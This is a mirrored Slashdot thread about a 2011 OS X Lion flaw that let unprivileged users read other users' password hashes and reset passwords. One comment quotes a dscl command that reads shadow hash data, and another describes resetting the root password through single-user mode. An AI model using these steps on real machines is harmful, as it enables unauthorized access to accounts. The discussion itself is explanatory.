Slashdot Mirror

← Back to Stories (view on slashdot.org)

Aussie Researcher Cracks OS X Lion Passwords

Posted by samzenpus on from the all-your-passwords-are-belong-to-me dept.

daria42 writes "Thought your Mac was secure running Apple's latest operating system? Think again. Turns out that in some respects Lion is actually less secure than previous version of Mac OS X, due to some permission-tweaking by Apple that has opened up a way for an attacker to crack your password on your Lion box. The flaw was discovered by an Australian researcher who has previously published a guide to cracking Mac OS X passwords. Sounds like Apple had better get a patch out for this."

11 of 165 comments (clear)

  1. Not really cracking the passwords. by Anonymous Coward · · Score: 4, Informative

    He's not really cracking the passwords. He's just found a way to read the hash and salt from each users shadow file without root privileges. It's fairly serious, but the hashes still need to be brute-forced.

    1. Re:Not really cracking the passwords. by CaptainJeff · · Score: 5, Interesting

      Most common approach to password cracking = brute force, targeting the specific hash (with the specific salt) of the account you're trying to crack. Step one of such an attack = determining the hash and salt that you're targeting. Which is what he figured out. If he's now bruteforcing those hashes, then he absolutely is cracking the passwords (well, he's trying to anyway).

      But your basic point is right...he's figured out a way to capture hash/salt data, which he still should not be able to do. Since Lion uses SHA-256 hashes for its shadow file, that cracking attempt is still going to be quite difficult.

      The more important part of this article is that under some circumstances, you can change the password of the logged in user without entering the current password. Now, *that* is a big deal (the degree of which is subject to valid debate).

    2. Re:Not really cracking the passwords. by Anonymous Coward · · Score: 4, Informative

      for this to work, a particular java app must be installed and run on a website which is run on the Mac OS X computer. .

      No, that's just one attack vector suggested in the article to illustrate how this could be abused.

      This is all possible, but basically FUD

      ANY application which runs with a regular user permission CAN access the hashes for ALL the user passwords on the system.
      That's not FUD. Also, the method described is not just possible, that's exactly how many infections occur these days.

  2. Here's the full details. by Core+Condor · · Score: 5, Informative

    http://www.techgineering.org/2011/09/22/2489/a-new-exploit-in-os-x-lion-allows-unauthorized-access-to-users-to-change-password/ - A New Exploit in OS X Lion Allows Unauthorized Access To Users to Change Password

    1. Re:Here's the full details. by spydir31 · · Score: 4, Informative

      Even better is the researchers' own blog post

  3. Extremely Serious by Manip · · Score: 4, Insightful

    I was expecting to read one of the normal fear-mongering stories that we often see on /. (e.g. "Drop Box sends passwords in plain text!!") but actually this is one of the most serious OS level holes I've seen in years. Not only can you retrieve the password for any user on the system but you can also reset their password without having to know what it was.

    People have posted "they're still hashes so you still have to break them" which is of course true, but if you keep reading down he shows you how to reset the other user's password without ever having to know them.

    1. Re:Extremely Serious by RyuuzakiTetsuya · · Score: 5, Funny

      Worst?! XP had that flaw that let you install Vista.

      --
      Non impediti ratione cogitationus.
  4. Re:So not serious by boristhespider · · Score: 4, Insightful

    You can change the root password on a Mac box without ANY credentials, provided you have physical access, Seems we have forgotten this while everyone is fear-mongering about what someone can do over the 'net.

    Sorry for the sarcasm, but basically once someone has physical access to your computer you're basically boned unless you've encrypted your drive. It's Macs I know best, and it's trivial: boot to single user mode (command+S at start), mount in the file system as read/write (it even gives onscreen instructions for doing this) and then change the root password. I imagine something very similar can be done in Linux if there's an easy way to get it into single-user mode. Besides, on any machine to which you have physical access you can always boot a live distro and at the very least access the hashes if not easily take full control of the system.

  5. Changing password without any challenge by Bloody+Peasant · · Score: 4, Interesting

    Agreed; and what most here have totally missed is the fact that there is no "existing password" challenge if you use dscl localhost... as TFA says right at the end, almost as an afterthought.

    --
    -- This .sig intentionally left meaningless.
  6. While it's possible... by Anonymous Coward · · Score: 5, Interesting

    Either it's already been patched, as I'm running the developer builds of 10.7.2, or there's an issue in his particular setup vs. a normal install that's allowing this to happen.

    Stepping through the information on his own blog at: http://www.defenceindepth.net/2011/09/cracking-os-x-lion-passwords.html

    When performing his "dscl localhost -read /Search/Users/" I do NOT get the dsAttrTypeNative:ShadowHashData result UNLESS I have root privileges through sudo. Not even for my own user.

  7. Re:Interesting contrast I notice here by Uberbah · · Score: 4, Interesting

    Its interesting how when OSX has....

    What's interesting is how every time Apple screws something up or does something unpopular, some clever guy pops in to post the requisite "now if this were Microsoft, you'd all be up in arms" post. Nevermind the same comment has been posted eleventy billion times before on this blog for more than 10 years.

    Case in point: the iCon 'book banning' story from 6 1/2 years ago, where publishing house Wiley had their books pulled after they wrote what Jobs obviously viewed as an unflattering biography:

    Balanced.. (Score:5, Insightful)
    by Flaming Death (447117)

    If this were a MS story of Bill Gates doing the same, there would be the usual crazy outbreak of 'MS evil empire' type banter. However, because its Apple , the response is a mild - 'oh its ok, hes the Apple man hes allowed to'. Where is the balance? I think somewhere in between to be honest - Jobs and Gates are simply very ruthless business persons, and yet here at Slashdot there is a decided overflow towards Apple.

    Or:

    Bill Gates and Microsoft (Score:4, Insightful)

    I agree that these guys have a right to some privacy. Most interesting to me is that the comments here on /. are generally supportive so far. What a different thread it would be if this had been Bill Gates and Microsoft instead of Steve Jobs and Apple.

    Nevermind the many highly rated comments suggesting Jobs back off, recounted how Jobs screwed Woz over a petty amount of money, or called Jobs an unbelievable asshole.

    So clever.